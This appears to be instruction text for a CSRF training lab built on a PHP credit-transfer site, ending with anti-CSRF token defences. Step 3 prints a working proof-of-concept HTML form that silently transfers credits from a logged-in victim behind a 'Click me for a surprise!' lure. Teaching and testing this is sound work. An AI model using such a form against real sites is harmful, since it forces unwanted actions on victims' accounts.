Instructions:

1. Creating an Account:
   • Navigate to the "Register" section.
   • Enter a unique username.
   • Enter a password.
   • Click on the "Register" button.
   • If successful, you will see a message saying "Registration successful!".
2. Logging In:
   • Navigate to the "Login" section.
   • Enter the username and password you registered with.
   • Click on the "Login" button.
   • If successful, you will see options for transferring credits and your current credit balance.
3. Creating a CSRF PoC: CSRF is a type of attack where an attacker tricks a victim into performing an unwanted action on a website where they're authenticated, usually without the victim's knowledge or consent. In this exercise, we'll demonstrate a simple CSRF attack by creating a form that can transfer credits from a logged-in user's account to another user without their knowledge.

   <!DOCTYPE html>
           <html lang="en">
           <head>
               <meta charset="UTF-8">
               <meta http-equiv="X-UA-Compatible" content="IE=edge">
               <meta name="viewport" content="width=device-width, initial-scale=1.0">
               <title>CSRF PoC</title>
           </head>
           <body>
   
           <h2>CSRF Attack Example</h2>
   
           <p>This page is crafted by an attacker to demonstrate a CSRF vulnerability. In a real-world scenario, a victim would be lured to this page while logged into the target website.</p>
   
           <form action="TARGET_URL" method="post">
               <input type="hidden" name="receiver" value="user1">
               <input type="hidden" name="amount" value="100">
               <input type="submit" value="Click me for a surprise!">
           </form>
   
           </body>
           </html>
           

   • Create an HTML page with the necessary form.
   • Replace `TARGET_URL` with the URL where the original PHP page is hosted.
   • When a logged-in user visits this crafted page and clicks on the provided button, credits will be transferred without their direct consent.
4. Testing the CSRF PoC:
   • Log in to the original PHP website with any user account (e.g., user2).
   • Visit the crafted CSRF PoC HTML page you created.
   • Click on the provided button.
   • Go back to the original PHP website and check the credits of the logged-in user and `user1`. You should notice that credits have been transferred.
5. Protecting Against CSRF: Implementing anti-CSRF tokens is a common measure to prevent CSRF attacks. With this mechanism, every form submission requires a unique token. Without the correct token, the server will reject the request.
   • Generate a unique token for every form displayed to the user.
   • Store this token in the user's session and also send it as a hidden field in the form.
   • On form submission, compare the token from the form with the one in the user's session. If they match, process the request. If not, reject it.
   • This ensures that only forms generated by your website can be used to submit data, preventing attackers from creating malicious forms to exploit CSRF vulnerabilities.

Hide Instructions